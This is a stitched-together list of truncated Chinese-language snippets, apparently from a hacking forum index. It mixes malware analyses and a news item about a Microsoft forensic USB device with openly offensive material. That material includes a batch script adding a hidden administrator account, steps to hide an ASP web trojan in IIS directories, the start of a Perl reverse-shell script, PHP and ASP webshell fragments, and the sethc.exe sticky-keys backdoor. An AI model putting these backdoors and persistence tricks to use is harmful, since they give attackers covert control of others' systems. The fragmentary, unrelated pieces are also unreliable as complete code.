主要行为：1、释放文件：C:\Windows\System32\datmps.dll 21,984 byteC:\Windows\System32\wlite.sys 8,816 bytes2、添加启动项：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\datmps]DllName = 64 61 74 6D 70 73 2E 64 ...

代码如下：    [code]@echo off    @attrib +s + r xyt.bat   @net user xyt hacker /add    @net localgroup administrators xyt /add    @net share...

[code]on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_  strComputer ...

[code]on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_  strComputer ...

1、建立非标准目录：mkdir images..\拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp通过web访问ASP木马：http://ip/images../news.asp?action=login如何删除非标准目录：rmdir images..\ /s2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:mkdir programme.asp新建1.txt文件内容：...

 最近这种猜测又有了新的证据，据称微软内建了一个对名为“USB Thumb Driver“设备的支持，以方便警方对电脑硬盘进行扫描。对于在线的计算机，警方在进行突击搜查时，可以在不关闭计算机的情况下遍历硬盘以及已解密的密码从而避免丢失关键性的证据。“我们在这方面投入了大量的资源，但并不是为了挣钱。”微软法律顾问Brad Smith这样对西雅图时报说，“我们这样做是为了增强网络安全。”这个thumb drive拥有150条命令并且可以记录硬盘的活动情况，包括浏览记录以及已解密的密码。微软从去年开始已经开始免费提供这种设备，据称已经有15个国家超过...

 反向连接代码： 1. #!/usr/bin/perl  2. #usage:  3. #nc -vv -l -p PORT(default 1988) on your local system first,then  4. #Perl $0 Remote IP(default 127.0.0.1) Remote_port(de...

<% 'code by netpatchdim dbfile,sql db="netpatch.asp"dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog") ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile set ydb=nothing if err....

总是忘记一句话放到哪个文件里去了，直接全部干掉...[code]<?//xy7 if (!isset($dir) or empty($dir)) { $dir=str_replace('\\','/',dirname(__FILE__)); echo "<font color=\"#00688B\">".$dir."</font>"; } else { $dir=$_GET['dir']; echo "<fon...

后门原理： 在windows 2000/xp/vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开shell了。 XP： 将安装源光盘弹出（或将硬盘上的安装目录改名) cd %widnir%\system32\dllcache ren sethc.exe *.ex~ cd %widnir%\system32 copy /y cmd...

病毒简介:      病毒名称：mdesvc.exe\Backdoor.Win32.IRCBot　　中文别名：MSN蠕虫　　文件长度：10752 byte　　文件MD5：633fc2332287108885ba0633efd81601　　依赖平台：Win 9X/ME/NT/2K/XP/2K3病毒分析:　　1、释放病毒副本：　　%Systemroot%\system32\mdesvc.exe 10752 字节　　2、添加注册表，开机启动：　　HKEY_LOCAL_MACHINE\SOFTWARE\...